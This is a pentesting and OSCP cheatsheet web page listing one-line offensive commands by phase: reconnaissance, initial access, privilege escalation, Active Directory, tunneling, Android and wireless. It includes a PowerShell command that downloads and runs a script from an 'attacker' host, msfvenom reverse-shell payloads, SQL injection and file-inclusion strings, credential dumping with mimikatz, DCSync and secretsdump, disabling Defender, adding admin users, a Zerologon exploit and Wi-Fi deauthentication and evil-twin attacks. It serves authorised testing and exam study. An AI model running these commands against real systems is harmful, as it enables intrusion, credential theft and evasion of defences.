root@shadow:~$ echo "Your Path to Pentester Role" > backdoor.php

universal pentest
& OSCP cheatsheet

Personal large collection of pentesting commands, techniques and one-liners. Filter by category, OS, or search.

[01] Reconnaissance Alert! To view more content, click the description below a terminal command. 42

nmap -sV --script=banner target

Banner Grabbing

Service Enumeration linux

ip a s

Basic Network Information

Network Discovery linux

host google.com

DNS Lookup with host

DNS & WHOIS linux

nslookup google.com

DNS Queries with nslookup

DNS & WHOIS linux windows

dnsrecon -d hackersploit.org

DNSRecon

DNS & WHOIS linux

dnsenum google.com

DNSenum

DNS & WHOIS linux

droopescan scan drupal -u target

Droopescan - Drupal/SilverStripe Scanner

Web Content Discovery linux

enum4linux -a target

Enum4linux / enum4linux-ng

Service Enumeration linux

hydra -L users -P pass target ftp

FTP Enumeration

Service Enumeration linux

feroxbuster -u target

Feroxbuster

Web Content Discovery linux

fierce --domain google.com

Fierce - DNS Subdomain Discovery

DNS & WHOIS linux

gobuster dir -u target -w wordlist

Gobuster - Directory and File Bruteforce

Web Content Discovery linux

nmap -sV --script=http-enum target

HTTP Enumeration

Service Enumeration linux

ldapsearch -x -H ldap://target -s base

LDAP Enumeration

Service Enumeration linux

mysql -u root -p -h target

MySQL Enumeration

Service Enumeration linux

nbtscan target

NetBIOS Enumeration

Service Enumeration linux

nmap -sn 192.168.2.0/24

Network Host Discovery

Network Discovery linux

nikto -h target

Nikto - Web Server Scanner

Web Content Discovery linux

nmap -Pn -F -sV -O -sC target

Nmap Advanced Scans

Nmap linux

nmap -sT -sV -A target

Nmap Basic Scans

Nmap linux

nmap -Pn -sA -p443,3389 target

Nmap Firewall & IDS Evasion

Nmap linux

nmap --script=mongodb-info target

Nmap NSE Scripts

Nmap linux

nmap -oN test.txt target

Nmap Output to File

Nmap linux

hydra rdp://target

RDP Enumeration

Service Enumeration linux

redis-cli -h target

Redis Enumeration

Service Enumeration linux

nmap -sV -p 445 --script "smb*" target

SMB Enumeration with Nmap

Service Enumeration linux

smbclient -L //target -U user

SMBClient

Service Enumeration linux

smbmap -H target -u user -p pass

SMBMap

Service Enumeration linux

nc -nvvv target 25

SMTP Enumeration

Service Enumeration linux

snmpwalk -v 1 -c public target

SNMP Enumeration

Service Enumeration linux

hydra -L users -P pass target ssh

SSH Enumeration

Service Enumeration linux

ffuf -u http://target/ -H "Host FUZZ.target"

Subdomain Enumeration with ffuf

Subdomain Enumeration linux

sublist3r -d hackersploit.org

Sublist3r - Subdomain Enumeration

Subdomain Enumeration linux

wafw00f hackersploit.org

WAFW00F - WAF Detection

Web Fingerprinting linux

whois hackersploit.org

WHOIS Lookup

DNS & WHOIS linux

wpscan --url target

WPScan - WordPress Scanner

Web Content Discovery linux

wfuzz -c -z file,wordlist --hc 404 url/FUZZ

Wfuzz - Directory and File Discovery

Web Content Discovery linux

whatweb hackersploit.org

WhatWeb - Web Technology Fingerprinting

Web Fingerprinting linux

crackmapexec winrm target -u user -p pass

WinRM Enumeration

Service Enumeration linux

dig -t any google.com

dig - DNS Information Groper

DNS & WHOIS linux

rpcclient -U "" -N target

rpcclient - RPC Enumeration

Service Enumeration linux

theHarvester -d google.com -b all

theHarvester - Email and Subdomain Harvesting

OSINT linux

[02] Initial Access Alert! To view more content, click the description below a terminal command. 31

nc -nvlp 1234

Bind and Reverse Shells with Netcat

Shells linux windows

ls -la /usr/share/webshells

Built-in Webshells (Kali)

Web Attacks linux

crackmapexec smb target -u users -p pass --continue-on-success

CrackMapExec / NetExec - SMB Login Spray

Bruteforce linux

ssh-keygen

File Upload Abuse - SSH authorized_keys

Web Attacks linux

curl --upload-file shell.php target/uploads/

HTTP PUT File Upload

Web Attacks linux

hashcat -a 0 -m mode hashes.txt wordlist

Hashcat - GPU Hash Cracking

Hash Cracking linux

hydra http-get /manager/

Hydra - HTTP Basic Auth Bruteforce

Bruteforce linux

hydra http-form-post target

Hydra - HTTP Form POST Bruteforce

Bruteforce linux

kerbrute passwordspray -d domain users.txt password

Initial Access via Reused Credentials Strategy

Bruteforce linux

john --wordlist=rockyou.txt hashes.txt

John the Ripper - Hash Cracking

Hash Cracking linux

curl with poisoned User-Agent then include log

LFI Log Poisoning to RCE

Web Attacks linux

curl 'target/page=php://filter/convert.base64-encode/resource=admin.php'

LFI PHP Wrappers

Web Attacks linux

cat - background.jpg > evil.jpg

LFI via Malicious Image Upload

Web Attacks linux

curl 'target/page.php?file=../../../../etc/passwd'

Local File Inclusion (LFI)

Web Attacks linux

manual checklist

Web Attacks linux windows

impacket-mssqlclient user:pass@target -windows-auth

MSSQL xp_cmdshell RCE

SQL Injection linux

xp_dirtree \\attacker\share

MSSQL xp_dirtree Hash Capture

SQL Injection linux

search type:exploit name:keyword

Metasploit Exploit Search

Payloads linux

msfconsole use exploit/multi/handler

Metasploit Multi/Handler Listener

Payloads linux

' UNION SELECT 1,2,3 #

MySQL UNION-based SQL Injection

SQL Injection linux

<?php phpinfo(); ?>

PHP Info Disclosure

Web Attacks linux

patator http_fuzz url=target user_pass=user:FILE0

Patator / Wfuzz Login Bruteforce

Bruteforce linux

hydra -l user -P pass target smb

SMB Bruteforce with Hydra

Bruteforce linux

' OR '1'='1

SQL Injection Auth Bypass Payloads

SQL Injection linux

python3 -c 'import pty;pty.spawn("/bin/bash")'

Shell Stabilization (Python pty)

Shells linux

nmap --script=http-shellshock target

Shellshock Exploitation

Web Attacks linux

msfconsole use scanner/http/tomcat_mgr_login

Tomcat Manager Login

Web Attacks linux

wmap_run -t

WMAP - Metasploit Web Scanner

Web Attacks linux

cadaver http://target/webdav

WebDAV Exploitation

Web Attacks linux

malicious.js

XSS - Cookie Stealing

Web Attacks linux

msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=port -f exe -o shell.exe

msfvenom - Generate Payloads

Payloads linux

[03] Privilege Escalation Alert! To view more content, click the description below a terminal command. 49

net user hacker password123 /add

Add Admin User and Enable RDP

Windows Misc windows

reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

AlwaysInstallElevated

Windows Misc windows

Get-Service AppIDSvc

AppLocker Recon and Common Bypass Path

Windows Misc windows

./linpeas.sh

Automated Linux Enumeration (LinPEAS / LinEnum)

Linux Tools linux

env

Bash History and Environment Hunting

Linux Privesc linux

SharpChromium.exe / firefox_decrypt.py

Browser Credential Extraction

Windows Credentials windows

cat /etc/crontab

Cron Job Enumeration

Linux Privesc linux

Set-MpPreference -DisableRealtimeMonitoring $true

Defender Status / Disable Realtime Monitoring

Windows Misc windows

GodPotato.exe -cmd cmd.exe

GodPotato

Windows Tokens windows

type payload.exe > windowslog.txt:winpeas.exe

Hiding Files via Alternate Data Streams

Windows Misc windows

powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1

JAWS / PrivescCheck

Windows Tools windows

.\JuicyPotato.exe -t * -p shell.bat -l 1337 -c "{CLSID}"

JuicyPotato / JuicyPotatoNG

Windows Tokens windows

getcap -r / 2>/dev/null

Linux Capabilities Abuse

Linux Privesc linux

gcc -pthread exploit.c -o exploit -lcrypt

Linux Kernel Exploits

Linux Privesc linux

ss -anp

Linux Network Enumeration

Linux Enumeration linux

ps aux

Linux Process Enumeration

Linux Enumeration linux

uname -a

Linux System Enumeration Basics

Linux Enumeration linux

use post/multi/recon/local_exploit_suggester

Meterpreter Post Modules

Windows Tools windows

select sys_eval("cp /bin/bash /var/tmp/bash; chmod u+s /var/tmp/bash");

MySQL Root - lib_mysqludf_sys SUID Trick

Linux Privesc linux

cat /etc/exports

NFS no_root_squash Abuse

Linux Privesc linux

export PATH=/tmp:$PATH

PATH Hijacking

Linux Privesc linux

type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

PowerShell History Hunting

Windows Credentials windows

powershell -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://attacker/PowerUp.ps1');Invoke-AllChecks

PowerUp.ps1 - Windows PrivEsc Checks

Windows Tools windows

powershell -ep bypass . \\share\CVE-2021-1675.ps1;Invoke-Nightmare

PrintNightmare (CVE-2021-1675 / 34527)

Windows Misc windows

.\PrintSpoofer64.exe -i -c cmd

PrintSpoofer (SeImpersonatePrivilege)

Windows Tokens windows

./cve-2021-4034-poc

PwnKit (CVE-2021-4034)

Linux Privesc linux

find / -perm -u=s -type f 2>/dev/null

SUID Binary Abuse

Linux Privesc linux

schtasks /query /fo LIST /v

Scheduled Task Hijacking

Windows Tasks windows

reg save hklm\sam c:\Temp\sam

SeBackup / SeRestore - SAM/NTDS Dump

Windows Tokens windows

services

Server Operators Group Abuse

Windows Services windows

icacls "C:\path\to\service.exe"

Service Binary Hijacking

Windows Services windows

Procmon64.exe (Filter for NAME NOT FOUND on .dll)

Service DLL Hijacking

Windows Services windows

sudo -l

Sudo Privilege Abuse

Linux Privesc linux

sudo nmap --script=/tmp/root.nse

Sudo nmap NSE Privesc

Linux Privesc linux

.\SweetPotato.exe -p test.bat

SweetPotato

Windows Tokens windows

.\Akagi64.exe 23 C:\Temp\backdoor.exe

UAC Bypass Techniques

UAC Bypass windows

type C:\Windows\Panther\Unattend.xml

Unattended Install Files - Local Admin Creds

Windows Credentials windows

wmic service get name,pathname | findstr /i /v "C:\Windows\\" | findstr /i /v """

Unquoted Service Paths

Windows Services windows

post/windows/gather/credentials/vnc

VNC Password Recovery (Meterpreter)

Windows Credentials windows

findstr /si password *.txt *.xml *.ini

Windows Credential Hunting in Files

Windows Credentials windows

./windows-exploit-suggester.py --database 2021-12-26-mssb.xls --systeminfo systeminfo.txt

Windows Exploit Suggester

Windows Tools windows linux

ipconfig /all

Windows Network Enumeration

Windows Enumeration windows

whoami /priv

Windows Privilege Enumeration

Windows Enumeration windows

tasklist /SVC

Windows Processes and Services

Windows Enumeration windows

openssl passwd w00t

Writable /etc/passwd

Linux Privesc linux

find / -writable -type d 2>/dev/null

Writable Files and Directories

Linux Privesc linux

impacket-smbserver share ./ -smb2support

impacket-smbserver - Stage Files and Run In-Memory

Windows Misc linux windows

./pspy64

pspy - Process Snooping

Linux Tools linux

.\winPEAS.exe

winPEAS

Windows Tools windows

[04] Active Directory Alert! To view more content, click the description below a terminal command. 46

Get-ObjectAcl -Identity user

ACL Analysis - GenericAll Rights

AD Enumeration windows

net users /domain

AD Domain Recon (net commands)

AD Enumeration windows

crackmapexec smb target -u users.txt -p 'Pass!' --continue-on-success

AD Password Spraying

AD Attacks linux

python3 username-generate.py -u names.txt -o generated_users.txt

AD Username Generator

AD Enumeration linux

PowerShell reflection trick

AMSI Bypass (Reflection / Obfuscated)

Evasion windows

impacket-GetNPUsers domain/ -dc-ip target -usersfile users.txt

AS-REP Roasting

AD Attacks linux windows

docker-compose up -d

BloodHound Community Edition

AD Enumeration linux

net group "Domain Admins" /domain

Built-in net Commands - Domain Enumeration

AD Enumeration windows

certipy-ad find -u user -p pass -dc-ip target -vulnerable

Certipy / ADCS Abuse

AD Attacks linux

crackmapexec smb target -u user -p pass --rid-brute

CrackMapExec / NetExec - RID Brute

AD Enumeration linux

$dcom.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c calc","7")

DCOM Lateral Movement (MMC20.Application)

AD Attacks windows

lsadump::dcsync /user:domain\user

DCSync

AD Attacks linux windows

net accounts

Domain Password Policy

AD Enumeration windows linux

Find-DomainShare -CheckShareAccess

Domain Share Hunting

AD Enumeration windows linux

gpp-decrypt 'cpassword'

GPP Password Decryption

AD Attacks linux windows

kerberos::golden /user:user /domain:domain /sid:SID /krbtgt:hash /ptt

Golden Ticket

AD Attacks windows

netexec smb target -u users.txt -H hashes.txt --continue-on-success

Hash Spraying with NetExec

AD Attacks linux

. .\HostRecon.ps1; Invoke-HostRecon

HostRecon.ps1

AD Enumeration windows

impacket-GetUserSPNs -request domain/user:pass -dc-ip target

Kerberoasting

AD Attacks linux windows

kerbrute userenum -d domain --dc target wordlist

Kerbrute - User Enumeration via Kerberos

AD Enumeration linux

sekurlsa::logonpasswords

Mimikatz - Credential Dumps

AD Attacks windows

impacket-secretsdump -ntds ntds.dit.bak -system system.bak LOCAL

NTDS.dit Extraction via Shadow Copy

AD Attacks windows linux

netexec smb target -u user -p pass --sam

NetExec - Remote Hash Dumping

AD Attacks linux

sekurlsa::pth /user:user /domain:domain /ntlm:hash /run:powershell

Overpass-the-Hash

AD Attacks windows

impacket-psexec -hashes :NTHASH user@target

Pass-the-Hash (PtH)

AD Attacks linux windows

kerberos::ptt ticket.kirbi

Pass-the-Ticket

AD Attacks windows

Invoke-UserHunter

PowerView - Session and User Hunting

AD Enumeration windows

Import-Module .\PowerView.ps1

PowerView Domain Enumeration

AD Enumeration windows

PsExec64.exe \\target -u domain\user -p pass cmd

PsExec - Remote Command Execution

Lateral Movement windows linux

responder -I eth0 -wpad -v

Responder - LLMNR/NBT-NS Poisoning

AD Attacks linux

.\Rubeus.exe kerberoast /outfile:hashes.txt

Rubeus

AD Attacks windows

proxychains python3 scshell.py user@target

SCShell - Service Hijack Lateral Movement

Lateral Movement linux

impacket-lookupsid anonymous@target

SID/RID Bruteforce - impacket-lookupsid

AD Enumeration linux

msfconsole use exploit/windows/smb/smb_relay

SMB Relay Attack

AD Attacks linux

Get-NetUser -SPN

SPN Enumeration

AD Enumeration windows linux

reg save hklm\sam c:\Temp\sam

SeBackup/SeRestore - SAM and System Hive Dump

AD Attacks windows

Invoke-BloodHound -CollectionMethod All

SharpHound - Data Collection

AD Enumeration windows linux

kerberos::golden /sid:SID /domain:domain /target:host /service:svc /rc4:hash /user:user /ptt

Silver Ticket

AD Attacks windows

.\StandIn.exe --gpo --filter "Default Domain Policy" --localadmin user

StandIn - GPO Abuse

AD Attacks windows

winrs -r:host -u:user -p:pass cmd

WinRS - Remote Shell over WinRM

Lateral Movement windows

python3 cve-2020-1472-exploit.py 'DC$' DC-IP

Zerologon (CVE-2020-1472)

AD Attacks linux

" reg, fodhelper ad-attacks active directory">

REG ADD HKCU\Software\Classes\ms-settings\Shell\Open\command /d "<encoded payload>"

fodhelper UAC Bypass (AD context)

AD Attacks windows

.\GMSAPasswordReader.exe --AccountName svc_apache

gMSA Password Read

AD Attacks windows

impacket-secretsdump -just-dc-ntlm domain/user@target

impacket-secretsdump - Domain NTLM Dump

AD Attacks linux

ldapsearch -x -H ldap://target -D 'user' -w 'pass' -b 'DC=domain,DC=local'

ldapsearch - Authenticated Dump

AD Enumeration linux

python3 windapsearch.py --dc-ip target -U --full

windapsearch - LDAP Enumeration

AD Enumeration linux

[05] Everywhere Tunnels Alert! To view more content, click the description below a terminal command. 19

chisel client kali:port R:socks

Chisel - HTTP-Tunneled SOCKS

Tunneling Tools linux windows

dnscat2-server domain

DNS Tunneling with dnscat2

DNS Tunneling linux

proxychains ssh -N -D 1081 user@hop2

Double Pivoting (chained SOCKS)

SSH Tunneling linux

base64 file > file.b64

File Transfer via base64 (No curl/wget/nc)

File Transfer linux

interface_add_route --name ligolo --route subnet

Ligolo-ng - TUN-based Pivoting

Tunneling Tools linux windows

run autoroute -s subnet

Meterpreter Autoroute

Meterpreter linux

portfwd add -l localport -p remoteport -r remotehost

Meterpreter portfwd

Meterpreter linux

netsh interface portproxy add v4tov4

Netsh Port Proxy (Windows)

Windows Tunneling windows

plink.exe -ssh -l user -pw pass -R port:host:port attacker

Plink - SSH Tunneling from Windows

SSH Tunneling windows

proxychains nmap target

ProxyChains Configuration

SSH Tunneling linux

sekurlsa::pth /run:"mstsc.exe /restrictedadmin"

RDP Pass-the-Hash (Restricted Admin)

Lateral Movement windows

ssh -N -D port user@pivot

SSH Dynamic Port Forwarding (-D / SOCKS)

SSH Tunneling linux windows

ssh -N -L localport:dest:destport user@pivot

SSH Local Port Forwarding (-L)

SSH Tunneling linux windows

ssh -N -R port user@kali

SSH Remote Dynamic Port Forwarding

SSH Tunneling linux

ssh -N -R kalilisten:dest:destport user@kali

SSH Remote Port Forwarding (-R)

SSH Tunneling linux windows

socat TCP-LISTEN:port,fork TCP:dest:port

Socat - Port Forwarding

Port Forwarding linux

net view 10.4.26.4

Windows Network Shares (net view / net use)

Lateral Movement windows

sudo systemctl start rinetd

rinetd - Simple Daemon Port Forwarder

Linux Tunneling linux

sshuttle -r user@pivot subnet

sshuttle - VPN over SSH

SSH Tunneling linux

[06] Android Alert! To view more content, click the description below a terminal command. 43

aapt dump badging app.apk

AAPT (Android Asset Packaging Tool)

Static Analysis linux windows

adb devices

ADB (Android Debug Bridge)

Basics linux windows

apktool d target_app.apk -o output_apktool

APK Decompilation

Static Analysis linux windows

apktool d AppName.apk

APK Recompilation

Repackaging linux windows

androguard analyze appka.apk

Androguard

Static Analysis linux

set payload android/meterpreter/reverse_tcp

Android Metasploit Listener Setup

Metasploit linux

bash script

Automated Security Scanner Script

Extra linux

adb shell input tap 760 745

Automatic Tapping (input tap)

Extra linux windows

adb bugreport

Bug Reports

Logging linux windows

Burp Proxy Listeners

Burp Suite Proxy Setup

Burp Suite linux windows

https://crt.sh/

Certificate Analysis (crt.sh)

Extra linux windows

apk-mitm AndroGoat.apk

Certificate Pinning Bypass

Burp Suite linux windows

dexdump -d classes.dex

DEX Analysis

Static Analysis linux

jdb -connect com.sun.jdi.SocketAttach:hostname=localhost,port=55555

Debuggable Application

Vulnerabilities linux windows

adb shell am start -a android.intent.action.VIEW "allsafe://infosecadventures/congrats"

Deep Links Exploitation

Vulnerabilities linux windows

drozer run

Drozer Basic Commands

Extra linux windows

drozer console connect

Drozer Basic Setup

Extra linux windows

frida -U -f com.target.app -l analysis_script.js

Frida Basic Commands

Frida linux windows

frida -U -f infosecadventures.allsafe -l Intercept_Android_APK_Crypto_Operations.js

Frida Crypto Operations Intercept

Frida linux windows

frida -U -f infosecadventures.allsafe -l secureflag.js

Frida FLAG_SECURE Bypass

Frida linux windows

frida -U 4463 -l root_bypass.js

Frida Root Detection Bypass

Frida linux windows

frida -U -f com.target.app --codeshare pcipolloni/universal-android-ssl-pinning-bypass-with-frida

Frida SSL Pinning Bypass

Frida linux windows

adb push frida-server-17.2.16-android-arm64 /data/local/tmp/frida-server

Frida Server Setup

Frida linux

msfvenom -p android/meterpreter/reverse_tcp

Generate Malicious APK (msfvenom)

Metasploit linux

keytool -genkeypair

Generate Signing Key

Repackaging linux windows

grep -r -E "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" temp_analysis/

Hardcoded Credentials Search

Vulnerabilities linux

adb shell am broadcast

Insecure Broadcast Receiver

Vulnerabilities linux windows

cd shared_prefs

Insecure Data Storage

Vulnerabilities linux

adb shell am startservice infosecadventures.allsafe/.challenges.RecorderService

Insecure Service

Vulnerabilities linux windows

adb shell am start -W -a android.intent.action.VIEW -d "insecureshop://com.insecureshop/web?url=http://192.168.1.14:9090/test.html"

Insecure WebView

Vulnerabilities linux windows

https://www.jwt.io/

JWT Token Analysis

Tokens linux windows

adb logcat

Logcat

Logging linux windows

sudo docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf

MobSF (Mobile Security Framework) - Docker Setup

Extra linux

d2j-apk-sign new_malware.apk

Modify SDK Version in APK

Metasploit linux

adb install-multiple *.apk

Multiple APK Installation

Basics linux windows

adb push C:\Users\user\Desktop\user.dat /sdcard/Android/data/infosecadventures.allsafe/files/

Object Serialization Exploit

Extra linux windows

adb shell pm list packages

Package Management

Basics linux windows

adb shell settings put global http_proxy <host-ip>:8080

Proxy via ADB

Burp Suite linux windows

adb shell screencap -p /data/local/tmp/test1.png

Remote Screenshot

Extra linux windows

%'/**/OR/**/1=1--

SQL Injection (Android)

Vulnerabilities linux windows

sqlite3 database.db

SQLite Database Analysis

Database linux

msfconsole search type:exploit platform:android

Search Android Exploits in Metasploit

Metasploit linux

apksigner sign --ks my-release-key.jks --in demo_malware.apk --out demo_malware2.apk

Signing APK

Repackaging linux windows

[07] Wireless Alert! To view more content, click the description below a terminal command. 23

arpspoof -i wlan0 -t [target ip] [router ip] -r

ARP Spoofing

Sniffing linux

besside-ng --bssid <router_MAC> --channel 10 wlan1

Attacking WEP with airtools and besside-ng

Attacks linux

sudo bettercap -iface wlan0

Attacking WPA2 with Bettercap

Attacks linux

airodump-ng --bssid aa:bb:cc:dd:ee:ff -c 4 -w capture wlan1

Attacking WPA2 with airtools

Attacks linux

sudo wifite

Attacking WiFi with wifite

Attacks linux

wifi.deauth ff:ff:ff:ff:ff:ff

Bettercap - Deauthentication Attack

Attacks linux

sudo ./fluxion.sh

Captive Portal Attack (fluxion)

Fake AP linux

sudo tcpdump -i eth0 -w packets.pcap

Capture network traffic

Sniffing linux

macchanger -a wlan1

Changing the MAC address

Setup linux

aireplay-ng --deauth 0 -a <BSSID of ROUTER> -c <STATION BSSID> -i wlan1

Deauthentication Attack

Attacks linux

ip addr

Dump information about network interfaces

Setup linux

sudo hostapd-mana NinjaWiFi-mana.conf

Evil Twin Attack

Fake AP linux

echo 1 > /proc/sys/net/ipv4/ip_forward

IP Forwarding

Sniffing linux

sudo aireplay-ng -9 -e ninja-wifi -a 14:15:BS:14:BS:15 wlan0mon

Injection test

Setup linux

sudo kismet -c wlan0 --no-ncurses

Kismet tool for monitoring wireless networks

Extra linux

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Man-in-the-Middle Attack (MITM) and Network Identification

Sniffing linux

sudo netdiscover

Network Identification

Setup linux

airmon-ng check

Process checking and cleaning

Setup linux

service network-manager restart

Restart network manager

Setup linux

sudo airmon-ng start wlan0

Setup monitor mode

Setup linux

driftnet -i eth0

Traffic Display Tools

Sniffing linux

airodump-ng -w dump wlan0mon

Wireless Network Graph

Extra linux

aircrack-ng -w /usr/share/wordlists/rockyou.txt -e networkname -b BS:ID:BS:ID:BS:ID wpa-01.cap

Wireless Password Cracking

Extra linux

universal pentest & OSCP cheatsheet

universal pentest
& OSCP cheatsheet